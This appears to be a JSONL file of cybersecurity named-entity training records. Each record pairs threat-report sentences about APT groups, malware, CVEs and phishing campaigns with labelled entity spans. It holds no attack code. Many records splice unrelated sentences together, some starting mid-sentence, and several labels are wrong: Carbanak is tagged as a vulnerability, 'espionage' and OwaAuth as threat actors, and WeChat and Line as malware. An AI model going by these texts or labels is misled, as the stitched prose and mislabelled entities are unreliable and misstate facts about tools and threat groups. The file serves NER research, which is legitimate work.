{"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval . The individuals using Hancitor malware also known by the name Chanitor are no exception and have taken three approaches to deliver the malware in order to ultimately steal data from their victims . The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered via a spear-phishing email 20 minutes later .", "spans": {"SYSTEM: AlarmManager": [[17, 29]], "THREAT_ACTOR: individuals": [[118, 129]], "TOOL: Hancitor": [[136, 144]], "TOOL: Chanitor": [[176, 184]]}, "info": {"id": "cyberner_stix_train_000507", "source": "cyberner_stix_train"}}
{"text": "] it ( \" attiva '' is the Italian for \" activate '' ) . The ultimate objective of targeted attacks is to acquire sensitive data . Takes screenshots from the infected machine . RDP is designed to allow legitimate users to remotely connect to and control a system , such as when IT support needs to remotely control an employees computer to troubleshoot an issue or conduct regular maintenance .", "spans": {"TOOL: RDP": [[176, 179]]}, "info": {"id": "cyberner_stix_train_000508", "source": "cyberner_stix_train"}}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "MALWARE: ASPXTool": [[232, 240]], "TOOL: Internet Information Services": [[246, 275]], "TOOL: IIS": [[278, 281]], "TOOL: Web shell": [[295, 304], [412, 421]], "THREAT_ACTOR: OwaAuth": [[375, 382]], "ORGANIZATION: Microsoft": [[439, 448]], "TOOL: Outlook": [[482, 489]]}, "info": {"id": "cyberner_stix_train_000509", "source": "cyberner_stix_train"}}
{"text": "These attacks are still largely perpetrated via spear phishing campaigns , whether via simple executable attachments in hopes that a victim will launch the file to using a previously observed DDE exploitation technique .", "spans": {}, "info": {"id": "cyberner_stix_train_000510", "source": "cyberner_stix_train"}}
{"text": "This visual context enables SOC personnel to investigate alerts with all related artifacts , understand the scope of the breach , and prepare a comprehensive action plan .", "spans": {}, "info": {"id": "cyberner_stix_train_000511", "source": "cyberner_stix_train"}}
{"text": "It is important to give certificates the protection they need so they can't be used maliciously .", "spans": {}, "info": {"id": "cyberner_stix_train_000512", "source": "cyberner_stix_train"}}
{"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform . Madcap” is similar to the XAgent malware , but the former is focused on recording audio . We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": {"MALWARE: Skygofree": [[30, 39]], "SYSTEM: Android": [[40, 47]], "MALWARE: Madcap”": [[141, 148]], "MALWARE: XAgent": [[167, 173]], "THREAT_ACTOR: admin@338 group": [[263, 278]], "MALWARE: BUBBLEWRAP": [[283, 293]]}, "info": {"id": "cyberner_stix_train_000513", "source": "cyberner_stix_train"}}
{"text": "If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities .", "spans": {}, "info": {"id": "cyberner_stix_train_000514", "source": "cyberner_stix_train"}}
{"text": "] 122:28844 61 [ . Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed . This additional payload is then executed in memory . Cisco Secure Malware Analytics ( Threat Grid ) identifies malicious binaries and builds protection into all Cisco Secure products .", "spans": {"THREAT_ACTOR: Dukes": [[44, 49]], "TOOL: Cisco Secure Malware Analytics": [[229, 259]], "TOOL: Threat Grid": [[262, 273]]}, "info": {"id": "cyberner_stix_train_000515", "source": "cyberner_stix_train"}}
{"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts u sed for application persistency . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": {"ORGANIZATION: 360 Core Security": [[173, 190]], "THREAT_ACTOR: APT-C-06": [[223, 231]], "VULNERABILITY: (CVE-2018-8174)": [[283, 298]]}, "info": {"id": "cyberner_stix_train_000516", "source": "cyberner_stix_train"}}
{"text": "We observed several samples of Zebrocy using this user agent targeting the foreign affairs ministry of a large Central Asian nation .", "spans": {"MALWARE: Zebrocy": [[31, 38]]}, "info": {"id": "cyberner_stix_train_000517", "source": "cyberner_stix_train"}}
{"text": "The now infamous Dridex banking Trojan can trace much of its DNA to Cridex and Bugat .", "spans": {"MALWARE: Dridex": [[17, 23]], "MALWARE: Trojan": [[32, 38]], "MALWARE: Cridex": [[68, 74]], "MALWARE: Bugat": [[79, 84]]}, "info": {"id": "cyberner_stix_train_000518", "source": "cyberner_stix_train"}}
{"text": "This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it .", "spans": {"THREAT_ACTOR: Sofacy": [[23, 29]]}, "info": {"id": "cyberner_stix_train_000519", "source": "cyberner_stix_train"}}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]], "ORGANIZATION: army officials": [[150, 164]], "MALWARE: WeChat": [[216, 222]], "MALWARE: SmeshApp": [[225, 233]], "MALWARE: Line": [[240, 244]], "ORGANIZATION: army personnel": [[345, 359]]}, "info": {"id": "cyberner_stix_train_000520", "source": "cyberner_stix_train"}}
{"text": "How does Chrysaor work ? On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . The configuration consists of four fields : This incident and last year ’s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features .", "spans": {"MALWARE: Chrysaor": [[9, 17]], "ORGANIZATION: Proofpoint": [[57, 67]], "THREAT_ACTOR: group": [[120, 125]], "ORGANIZATION: shipbuilding company": [[141, 161]], "ORGANIZATION: military": [[203, 211]], "MALWARE: INDUSTROYER.V2": [[294, 308]], "THREAT_ACTOR: OT attack capabilities": [[350, 372]]}, "info": {"id": "cyberner_stix_train_000521", "source": "cyberner_stix_train"}}
{"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "MALWARE: Trojan.Naid": [[221, 232]], "FILEPATH: Backdoor.Moudoor": [[235, 251]], "MALWARE: Backdoor.Hikit": [[258, 272]]}, "info": {"id": "cyberner_stix_train_000522", "source": "cyberner_stix_train"}}
{"text": "These improvements render FakeSpy one of the most powerful information stealers on the market . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we’ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . DHS has previously released Alert TA14-353A .", "spans": {"MALWARE: FakeSpy": [[26, 33]], "ORGANIZATION: Agari Cyber Intelligence": [[122, 146]], "THREAT_ACTOR: group": [[179, 184]], "THREAT_ACTOR: Scattered Canary": [[197, 213]], "ORGANIZATION: business": [[360, 368]], "ORGANIZATION: DHS": [[371, 374]]}, "info": {"id": "cyberner_stix_train_000523", "source": "cyberner_stix_train"}}
{"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": {"ORGANIZATION: Microsoft": [[39, 48]], "TOOL: Threat Intelligence Center": [[49, 75]]}, "info": {"id": "cyberner_stix_train_000524", "source": "cyberner_stix_train"}}
{"text": "Finally , the app can remove itself through three ways : Via a command from the server Autoremove if the device has not been able to check in to the server after 60 days Via an antidote file . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu . Domain names were carefully chosen to look like they are related to the game or application publisher . When the malware is executed , it attempts to run the following commands , most of which attempt to stop various security and backup related software", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[193, 207]], "THREAT_ACTOR: TEMP.Jumper": [[297, 308]], "THREAT_ACTOR: group": [[313, 318]], "TOOL: NanHaiShu": [[377, 386]], "MALWARE: malware": [[502, 509]]}, "info": {"id": "cyberner_stix_train_000525", "source": "cyberner_stix_train"}}
{"text": "Symantec worked with the certificate owner to confirm that the hacktool was not associated with them .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyberner_stix_train_000526", "source": "cyberner_stix_train"}}
{"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software : browsers , email clients , messengers , etc. , and can act as a keylogger . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: AveMaria": [[276, 284]], "TOOL: email": [[397, 402]]}, "info": {"id": "cyberner_stix_train_000527", "source": "cyberner_stix_train"}}
{"text": "Such devices still must be identifiable , maintained , and monitored by security teams , especially in large complex enterprises .", "spans": {}, "info": {"id": "cyberner_stix_train_000528", "source": "cyberner_stix_train"}}
{"text": "The webshell named bitreeview.aspx was saved to a folder within the SharePoint server ’s install path .", "spans": {"FILEPATH: bitreeview.aspx": [[19, 34]], "TOOL: SharePoint": [[68, 78]]}, "info": {"id": "cyberner_stix_train_000529", "source": "cyberner_stix_train"}}
{"text": "The campaign ’s lure content revolves around recent geopolitical events , espeically the Israeli-Palestinian conflict , the assassination of Qasem Soleimani , and the ongoing conflict between Hamas and Fatah Palestinian movements .", "spans": {}, "info": {"id": "cyberner_stix_train_000530", "source": "cyberner_stix_train"}}
{"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"VULNERABILITY: Flash exploit": [[65, 78]], "VULNERABILITY: CVE-2016-4117": [[81, 94]], "ORGANIZATION: Government officials": [[161, 181]]}, "info": {"id": "cyberner_stix_train_000531", "source": "cyberner_stix_train"}}
{"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": {"ORGANIZATION: Group-IB": [[126, 134]], "ORGANIZATION: bank": [[224, 228]], "ORGANIZATION: Microsoft": [[335, 344]], "TOOL: Word": [[345, 349]], "TOOL: EPS": [[389, 392]], "SYSTEM: Windows": [[448, 455]], "VULNERABILITY: CVE-2015-1701": [[491, 504]], "THREAT_ACTOR: attacker": [[545, 553]], "SYSTEM: Microsoft Exchange Server": [[593, 618]]}, "info": {"id": "cyberner_stix_train_000532", "source": "cyberner_stix_train"}}
{"text": "After launching , it hides its presence on the system and checks the defined Twitter account at regular intervals for commands . The first type of attack Scattered Canary pivoted to was credential phishing . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": {"SYSTEM: Twitter": [[77, 84]], "THREAT_ACTOR: Scattered Canary": [[154, 170]], "MALWARE: KillDisk": [[218, 226]], "THREAT_ACTOR: attackers": [[295, 304]], "THREAT_ACTOR: cyber-sabotage": [[399, 413]]}, "info": {"id": "cyberner_stix_train_000533", "source": "cyberner_stix_train"}}
{"text": "Before connecting with the socket , it creates a malware environment in ‘ APPDATA/myupd ’ and creates a sqlite3 database there – ‘ myupd_tmp\\\\mng.db ’ : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar . FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": {"MALWARE: document": [[373, 381]], "THREAT_ACTOR: FIN4": [[521, 525]]}, "info": {"id": "cyberner_stix_train_000534", "source": "cyberner_stix_train"}}
{"text": "Earlier this year , Cybereason identified an advanced , persistent attack targeting telecommunications providers that has been underway for years , soon after deploying into the environment . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Cybereason": [[20, 30]], "ORGANIZATION: telecommunications providers": [[84, 112]], "ORGANIZATION: Deepen": [[192, 198]], "ORGANIZATION: China and US relations experts": [[287, 317]], "ORGANIZATION: Defense Department": [[320, 338]], "ORGANIZATION: geospatial groups": [[354, 371]], "ORGANIZATION: federal government": [[383, 401]]}, "info": {"id": "cyberner_stix_train_000535", "source": "cyberner_stix_train"}}
{"text": "COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[0, 12]], "ORGANIZATION: telecommunications": [[46, 64]], "ORGANIZATION: government": [[67, 77]], "ORGANIZATION: defense": [[80, 87]], "ORGANIZATION: oil": [[90, 93]], "ORGANIZATION: financial services organizations": [[100, 132]], "ORGANIZATION: individual victims": [[191, 209]], "ORGANIZATION: social media": [[218, 230]], "SYSTEM: Windows": [[312, 319]], "FILEPATH: KBDLV2.DLL": [[366, 376]], "FILEPATH: AUTO.DLL": [[380, 388]]}, "info": {"id": "cyberner_stix_train_000536", "source": "cyberner_stix_train"}}
{"text": "Google officials removed the malicious apps from the Play market after receiving a private report of their existence . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness . Elfin also makes frequent use of a number of publicly available hacking tools , including : Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"ORGANIZATION: Google": [[0, 6]], "SYSTEM: Play market": [[53, 64]], "THREAT_ACTOR: Romeo": [[149, 154]], "THREAT_ACTOR: Sierra groups": [[159, 172]], "THREAT_ACTOR: Lazarus Group": [[389, 402]], "TOOL: RATs": [[420, 424]], "TOOL: staging malware": [[429, 444]], "THREAT_ACTOR: Elfin": [[497, 502]], "THREAT_ACTOR: Will Harrison": [[589, 602]], "ORGANIZATION: Ashley Madison": [[624, 638]]}, "info": {"id": "cyberner_stix_train_000537", "source": "cyberner_stix_train"}}
{"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “ POWERSTATS ” .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "TOOL: PowerShell-based": [[69, 85]], "MALWARE: POWERSTATS": [[117, 127]]}, "info": {"id": "cyberner_stix_train_000538", "source": "cyberner_stix_train"}}
{"text": "The commands are self-explanatory and show the features included in the malware . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions . We found more than 40 of these campaign tags . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"TOOL: Blue Lambert": [[109, 121]], "TOOL: Green Lambert": [[174, 187]]}, "info": {"id": "cyberner_stix_train_000539", "source": "cyberner_stix_train"}}
{"text": "The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns—an interesting development that we will tackle further in this blog post .", "spans": {"MALWARE: Trojan": [[33, 39]], "MALWARE: OSX_DOK.C": [[128, 137]], "MALWARE: WERDLOD": [[169, 176]], "ORGANIZATION: Trend Micro": [[191, 202]], "MALWARE: TROJ_WERDLOD Family": [[206, 225]]}, "info": {"id": "cyberner_stix_train_000540", "source": "cyberner_stix_train"}}
{"text": "Receiver was involved in receiving commands from the Server and the main functionality of Sender was to send all the data collected to the C & C over Wi-Fi . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team .", "spans": {"TOOL: Atmosphere": [[216, 226]], "THREAT_ACTOR: Silence": [[251, 258]], "MALWARE: xfs-disp.exe": [[324, 336]], "ORGANIZATION: Bank": [[391, 395]], "THREAT_ACTOR: Cobalt Group": [[409, 421]], "MALWARE: Cobalt": [[470, 476]], "MALWARE: Strike beacon": [[477, 490]], "MALWARE: JavaScript backdoor": [[498, 517]], "ORGANIZATION: Talos": [[558, 563]]}, "info": {"id": "cyberner_stix_train_000541", "source": "cyberner_stix_train"}}
{"text": "On September 10 , 2019 , we observed an HTTP POST request to the following URL that we believe was the exploitation of CVE-2019-0604 in a publicly facing SharePoint server ( T1190 ) : /_layouts/15/picker.aspx .", "spans": {"VULNERABILITY: CVE-2019-0604": [[119, 132]], "TOOL: SharePoint": [[154, 164]], "FILEPATH: /_layouts/15/picker.aspx": [[184, 208]]}, "info": {"id": "cyberner_stix_train_000542", "source": "cyberner_stix_train"}}
{"text": "After the modules are installed they are deployed to the short term memory and deleted from the device storage , which makes the Trojan a lot harder to catch . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . Helminth executable samples send artifacts within network beacons to its C2 server that the Trojan refers to as a ' Group ' and ' Name ' .", "spans": {"THREAT_ACTOR: ScarCruft": [[160, 169]], "VULNERABILITY: Flash Player exploit": [[208, 228]], "VULNERABILITY: CVE-2016-4117": [[231, 244]], "MALWARE: Helminth": [[290, 298]], "TOOL: C2": [[363, 365]], "MALWARE: Trojan": [[382, 388]]}, "info": {"id": "cyberner_stix_train_000543", "source": "cyberner_stix_train"}}
{"text": "In this case , Group 74 did not use an exploit or any 0-day but simply used scripting language embedded within the Microsoft Office document .", "spans": {"THREAT_ACTOR: Group 74": [[15, 23]], "VULNERABILITY: 0-day": [[54, 59]], "ORGANIZATION: Microsoft": [[115, 124]], "TOOL: Office": [[125, 131]]}, "info": {"id": "cyberner_stix_train_000544", "source": "cyberner_stix_train"}}
{"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[174, 184]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: espionage": [[201, 210]], "THREAT_ACTOR: admin@338": [[264, 273]], "ORGANIZATION: financial": [[302, 311]], "ORGANIZATION: policy organizations": [[316, 336]], "TOOL: emails": [[376, 382]], "ORGANIZATION: audiences": [[425, 434]]}, "info": {"id": "cyberner_stix_train_000545", "source": "cyberner_stix_train"}}
{"text": "Retrieve media exchanged through WhatsApp . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 . In one instance , it lures victims to open an email attachment . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": {"SYSTEM: WhatsApp": [[33, 41]], "TOOL: email": [[208, 213]], "THREAT_ACTOR: Rhysida": [[227, 234]], "ORGANIZATION: Chilean Army": [[406, 418]]}, "info": {"id": "cyberner_stix_train_000546", "source": "cyberner_stix_train"}}
{"text": "This is done by reading the /proc/ [ pid ] /cmdline file . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments . This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down . • Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar – if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": {"ORGANIZATION: industrial": [[124, 134]], "ORGANIZATION: manufacturing": [[137, 150]], "ORGANIZATION: engineering organizations": [[155, 180]], "ORGANIZATION: Kaspersky Lab": [[183, 196]], "THREAT_ACTOR: APT17": [[346, 351]], "THREAT_ACTOR: MiniDuke - s creators": [[461, 482]], "ORGANIZATION: Twitter": [[554, 561]], "MALWARE: malware": [[609, 616]], "ORGANIZATION: Google": [[625, 631]]}, "info": {"id": "cyberner_stix_train_000547", "source": "cyberner_stix_train"}}
{"text": "Another evasive mechanism used by the backdoor is how it checks whether an Arabic keyboard and Arabic language settings are used on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_000548", "source": "cyberner_stix_train"}}
{"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer ’s passwords and in the third instance the latest security update had not been applied to the device .", "spans": {}, "info": {"id": "cyberner_stix_train_000549", "source": "cyberner_stix_train"}}
{"text": "As can be seen , the possibilities offered by the bot are pretty common . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"THREAT_ACTOR: SectorJ04": [[78, 87]], "MALWARE: document files": [[180, 194]], "THREAT_ACTOR: attacker": [[262, 270]], "ORGANIZATION: Kaspersky": [[335, 344]], "THREAT_ACTOR: BlackOasis group": [[355, 371]], "TOOL: Adobe Flash Player": [[389, 407]], "VULNERABILITY: zero-day": [[408, 416]], "VULNERABILITY: CVE-2016-4117": [[433, 446]], "MALWARE: FinSpy": [[493, 499]]}, "info": {"id": "cyberner_stix_train_000550", "source": "cyberner_stix_train"}}
{"text": "Due to artefacts left in the loader during compilation time however , we know that it used a specific version of the Boost library , 1.54.0 , that was only published on the 1st of July 2013 .", "spans": {"TOOL: Boost": [[117, 122]]}, "info": {"id": "cyberner_stix_train_000551", "source": "cyberner_stix_train"}}
{"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . The threat actor 's known working hours align to Chinese Standard TIME ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"TOOL: ActiveX control": [[190, 205]], "MALWARE: JavaScript file": [[220, 235]], "VULNERABILITY: CVE-2013-7331": [[347, 360]], "THREAT_ACTOR: actors": [[578, 584]], "THREAT_ACTOR: APT10": [[655, 660]]}, "info": {"id": "cyberner_stix_train_000552", "source": "cyberner_stix_train"}}
{"text": "The second stealing function is the onStartCommand , which steals infected device data and additional information . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": {"THREAT_ACTOR: Ke3chang": [[295, 303]], "THREAT_ACTOR: attackers": [[304, 313]]}, "info": {"id": "cyberner_stix_train_000553", "source": "cyberner_stix_train"}}
{"text": "What is less common is that the name used for the mutex is often a timestamp .", "spans": {}, "info": {"id": "cyberner_stix_train_000554", "source": "cyberner_stix_train"}}
{"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine . The most common ports used are , 80, 1985, 1986, and 443 . 1985 is the default port for the malware , 1986 is the lazy variation of that port . For this year 's State of Malware report we asked : What do resource constrained organizations need to know in 2023 ?", "spans": {"TOOL: Binders": [[327, 334]], "ORGANIZATION: organizations": [[656, 669]]}, "info": {"id": "cyberner_stix_train_000555", "source": "cyberner_stix_train"}}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "MALWARE: PlugX": [[186, 191]], "MALWARE: HTTPBrowser": [[199, 210]], "MALWARE: RAT": [[213, 216]]}, "info": {"id": "cyberner_stix_train_000556", "source": "cyberner_stix_train"}}
{"text": "Additionally , should the command-and-control ( C & C ) servers get seized by the authorities , it would ultimately lead to disclosing information about the entire botnet . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": {"THREAT_ACTOR: Scattered Canary": [[184, 200]], "VULNERABILITY: phishing": [[269, 277]], "ORGANIZATION: media": [[339, 344]], "THREAT_ACTOR: attackers": [[408, 417]], "THREAT_ACTOR: Lazarus": [[447, 454], [525, 532]], "ORGANIZATION: banks": [[581, 586]]}, "info": {"id": "cyberner_stix_train_000557", "source": "cyberner_stix_train"}}
{"text": "All included decoy document written in Arabic ( all related to Middle Eastern politics ) or Hebrew .", "spans": {"TOOL: decoy document": [[13, 27]]}, "info": {"id": "cyberner_stix_train_000558", "source": "cyberner_stix_train"}}
{"text": "During this period of transition , CosmicDuke would often embed PinchDuke so that , upon execution , CosmicDuke would write to disk and execute PinchDuke .", "spans": {"MALWARE: CosmicDuke": [[35, 45], [101, 111]], "MALWARE: PinchDuke": [[64, 73], [144, 153]]}, "info": {"id": "cyberner_stix_train_000559", "source": "cyberner_stix_train"}}
{"text": "It also starts an Android service named MainService . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": {"SYSTEM: Android": [[18, 25]], "THREAT_ACTOR: Gaza Cybergang Group3": [[54, 75]], "ORGANIZATION: Novetta": [[224, 231]], "ORGANIZATION: Kaspersky": [[236, 245]]}, "info": {"id": "cyberner_stix_train_000560", "source": "cyberner_stix_train"}}
{"text": "Typically , their primary goal is to obtain domain administrator credentials and/or gain access to a system storing intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_000561", "source": "cyberner_stix_train"}}
{"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims . Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": {"THREAT_ACTOR: Lazarus Group": [[257, 270]], "THREAT_ACTOR: espionage": [[298, 307]], "THREAT_ACTOR: Elfin": [[392, 397]]}, "info": {"id": "cyberner_stix_train_000562", "source": "cyberner_stix_train"}}
{"text": "The target 's job function , corporate email address , information on work related projects , and publicly accessible personal blog could all be freely found online .", "spans": {"TOOL: email": [[39, 44]]}, "info": {"id": "cyberner_stix_train_000563", "source": "cyberner_stix_train"}}
{"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"MALWARE: RIPPER": [[0, 6]], "MALWARE: Kazuar tool": [[155, 166]], "THREAT_ACTOR: Turla": [[188, 193]], "THREAT_ACTOR: Uroburos": [[229, 237]], "THREAT_ACTOR: Snake": [[242, 247]], "ORGANIZATION: embassies": [[295, 304]], "ORGANIZATION: defense contractors": [[307, 326]], "ORGANIZATION: educational institutions": [[329, 353]], "ORGANIZATION: research organizations": [[360, 382]]}, "info": {"id": "cyberner_stix_train_000564", "source": "cyberner_stix_train"}}
